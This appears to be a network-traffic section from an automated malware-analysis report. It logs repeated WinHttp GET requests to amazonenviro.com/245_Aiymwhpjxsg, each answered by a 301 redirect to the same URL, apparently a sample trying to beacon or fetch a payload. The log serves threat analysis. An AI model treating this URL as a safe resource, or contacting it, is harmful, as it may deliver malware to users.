                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:15.077289104 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:15.387444973 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:15 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:17.072043896 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:17.383162975 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:17 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:19.002906084 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:19.313546896 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:19 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:20.953970909 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:21.264297009 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:21 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:22.905419111 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:23.215960026 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:23 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:24.948091984 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:25.259886026 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:25 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:26.894489050 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:27.204391003 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:27 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:28.865905046 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:29.176359892 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:29 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:30.796313047 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:31.106925011 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:30 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:32.719608068 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:33.138227940 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:32 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:34.761452913 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:35.071767092 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:34 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:36.721414089 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:37.031873941 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:36 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:38.674072027 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:38.984817028 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:38 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:40.635659933 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:40.946182013 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:40 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
